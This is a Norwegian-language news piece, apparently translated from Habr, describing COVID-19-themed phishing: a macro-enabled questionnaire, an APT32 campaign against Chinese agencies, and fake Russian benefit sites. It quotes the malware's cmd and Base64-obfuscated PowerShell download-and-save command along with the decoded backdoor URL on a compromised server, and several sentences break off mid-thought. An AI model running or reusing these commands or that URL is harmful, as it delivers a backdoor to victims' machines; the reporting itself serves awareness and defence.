Angripere fortsetter å utnytte COVID-19-emnet, og skaper flere og flere trusler for brukere som er svært interessert i alt relatert til epidemien. I
Husk inn
Vil du ha en gratis test for COVID-19?
Et annet viktig eksempel på phishing med koronavirus-tema var
Det var også enkelt å overbevise de fleste brukere om å aktivere makroer. For å gjøre dette ble et standardtriks brukt: for å fylle ut spørreskjemaet, må du først aktivere makroer, noe som betyr at du må kjøre et VBA-skript.
Som du kan se, er VBA-skriptet spesielt maskert fra antivirus.
Windows har en ventefunksjon der applikasjonen venter /T <sekunder> før den godtar standard "Ja"-svar. I vårt tilfelle ventet skriptet 65 sekunder før de slettet midlertidige filer:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Og mens du ventet, ble skadelig programvare lastet ned. Et spesielt PowerShell-skript ble lansert for dette:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Etter dekoding av Base64-verdien, laster PowerShell-skriptet ned bakdøren som ligger på den tidligere hackede webserveren fra Tyskland:
http://automatischer-staubsauger.com/feature/777777.png
og lagrer den under navnet:
C:UsersPublictmpdirfile1.exe
Folder ‘C:UsersPublictmpdir’
slettes når du kjører 'tmps1.bat'-filen som inneholder kommandoen cmd /c mkdir ""C:UsersPublictmpdir"".
Målrettet angrep på offentlige etater
I tillegg rapporterte FireEye-analytikere nylig om et målrettet APT32-angrep rettet mot regjeringsstrukturer i Wuhan, samt det kinesiske beredskapsdepartementet. En av de distribuerte RTF-ene inneholdt en lenke til en New York Times-artikkel med tittelen
Interessant nok oppdaget ingen av antivirusene denne forekomsten på tidspunktet for oppdagelsen, ifølge Virustotal.
Når offisielle nettsider er nede
Det mest slående eksemplet på et phishing-angrep skjedde i Russland forleden dag. Bakgrunnen for dette var oppnevning av en etterlengtet ytelse for barn i alderen 3 til 16 år. Da starten på å akseptere søknader ble annonsert 12. mai 2020, skyndte millioner seg inn på nettsiden til Statens tjenester for den etterlengtede hjelpen og brakte portalen ikke verre enn et profesjonelt DDoS-angrep. Da presidenten sa at "Offentlige tjenester ikke kunne takle strømmen av søknader," begynte folk å snakke på nettet om lanseringen av et alternativt nettsted for å akseptere søknader.
Problemet er at flere nettsteder begynte å fungere samtidig, og mens en, den virkelige på posobie16.gosuslugi.ru, faktisk godtar søknader, mer
Kolleger fra SearchInform fant rundt 30 nye uredelige domener i .ru-sonen. Infosecurity og Softline Company har sporet mer enn 70 lignende falske offentlige tjenestenettsteder siden begynnelsen av april. Skaperne deres manipulerer kjente symboler og bruker også kombinasjoner av ordene gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, og så videre.
Hype og sosial ingeniørkunst
Alle disse eksemplene bekrefter bare at angripere lykkes med å tjene penger på temaet koronavirus. Og jo høyere sosial spenning og jo mer uklare problemstillinger, jo større sjanse har svindlere til å stjele viktige data, tvinge folk til å gi opp pengene sine på egen hånd, eller rett og slett hacke flere datamaskiner.
Og gitt at pandemien har tvunget potensielt uforberedte mennesker til å jobbe hjemmefra i massevis, er ikke bare personlige, men også bedriftsdata i fare. For eksempel ble Microsoft 365-brukere (tidligere Office 365) nylig også utsatt for et phishing-angrep. Folk mottok massive «glippede» talemeldinger som vedlegg til brev. Imidlertid var filene faktisk en HTML-side som sendte ofre for angrepet til
Kilde: www.habr.com